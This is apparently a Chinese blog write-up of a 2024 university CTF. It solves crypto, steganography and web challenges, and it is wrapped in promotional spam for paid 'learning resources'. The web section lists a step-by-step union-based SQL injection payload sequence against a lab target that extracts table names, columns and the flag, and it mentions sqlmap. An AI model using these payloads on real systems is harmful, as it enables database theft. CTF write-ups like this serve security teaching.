2024年合肥师范学院网络分布式技能赛校赛 WP

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

CRYPTO

[HFNU 选拔赛] 签到!

打开base64.txt后,有一串编码,很明显是base64编码,直接解码即可在这里插入图片描述

得到flag:flag{Welcome-to-HFNU}

[HFNU 选拔赛] easy_caeser

打开文件后,是一串社会核心价值观编码,我们进行在线解码
在这里插入图片描述在这里插入图片描述

然后得到字符串mshn{jhlzly6_cl1yf_lhz1f},根据题目名可知这是凯撒密码,因为第一个字符应该是’f’,所以偏移量为7,我们编写脚本来解密

txt = "mshn{jhlzly6\_cl1yf\_lhz1f}"
flag = ""

for ch in txt:
    if ch.isalpha():
        flag += chr(ord('a') + (ord(ch) - 7 - ord('a')) % 26)
    else:
        flag += ch

print(flag)

# 输出:flag{caeser6\_ve1ry\_eas1y}

[HFNU 选拔赛] easy_Affine

打开文件发现一串编码,我们进行解码
在这里插入图片描述

得到cwuo{gucq_mc_qucw2w2} ,解码步骤:base64 > base32 ,这里提一下base64和base32的区别,base32中的字母全为大写字母
在这里插入图片描述

根据文件里的 The last step is affine cryptography !可知,最后一步为仿射密码,两个key即为文件名中的12,20,我们用在线解密网站解密,得到flag:flag{bafe_if_eafl1l1}
在这里插入图片描述

MISC

[HFNU 选拔赛] IU_beauty?

题目是一张IU的照片,我们用binwalk查看下文件结构
在这里插入图片描述
发现照片里藏着zip文件,那这题是经典的图片分离,我们用 -e 参数分离照片
在这里插入图片描述

得到两个zip文件,其中一个有密码,另一个则是base.txt
在这里插入图片描述

这明显就是密码,我们进行base64解码(一般后面有两个==就是base64编码),得到love_iu_ever,果然是另一个压缩包的密码,解压后得到flag:flag{iu_1s_very_11l1}
在这里插入图片描述

[HFNU 选拔赛] 眼睛不用可以捐掉

题目给的是一个zip文件和一张图片,发现zip有密码,那密码只能在图片上找了
在这里插入图片描述

发现图片有备注,有一串字符,应该是zip的密码
在这里插入图片描述

解压后有一串摩斯密码,我们在线解密后得到flag:flag{HFNU-EASY-EASY-MORSECODE}
在这里插入图片描述

[HFNU 选拔赛] 损坏的png

题目给的是一个没有后缀名的文件,我们用010 editor打开,发现png文件头不全,给它补好
在这里插入图片描述

我们加上.png的后缀名后打开,是一张电量图片,并没有发现藏有文件,那么可以猜测是lsb隐写
在这里插入图片描述

用Stegsolve打开该图片,我们勾选RGB的0后发现隐写的flag:NSSCTF{Wlec0me_to_NiSa2022 }
在这里插入图片描述

Web

[HFNU 选拔赛] 你能打几只?

打开网页后是个前端的打兔子游戏,既然是前端就好办了,找他的js文件进行分析
在这里插入图片描述按f12,发现有js文件,那么肯定有一个函数是通关显示flag的,我们ctrl + f 搜索NSSCTF后即可看见flag:NSSCTF{50b5d57d-9610-4420-a673-bb70ab6cb340}
在这里插入图片描述

[HFNU 选拔赛] SQL injection

这题是sql注入,参数是wllm,那我们按基础的思路来:

  • 先检测注入点
  • 然后联合注入脱库
  • 然后依次拿数据库名,表名,列名,flag
    在这里插入图片描述
  • ?wllm=1’ and 1=1–+
  • ?wllm=1’ and 1=2–+ //检测注入点
  • ?wllm=1’ order by 3–+ //判断字段
  • ?wllm=1’ and 1=2 union select 1,2,3–+
  • ?wllm=1’ and 1=2 union select 1,version(),database()–+ //查下版本和数据库名
  • ?wllm=1’ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘test_db’–+ //查表名
  • ?wllm=1’ and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘test_tb’–+ //查列名
  • ?wllm=1’ and 1=2 union select 1,2,group_concat(flag) from test_tb–+ //拿到flag

在这里插入图片描述
另解:这题是最基础的sql注入,除了手工注入外,我们可以用sqlmap直接跑,也能拿到flag

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值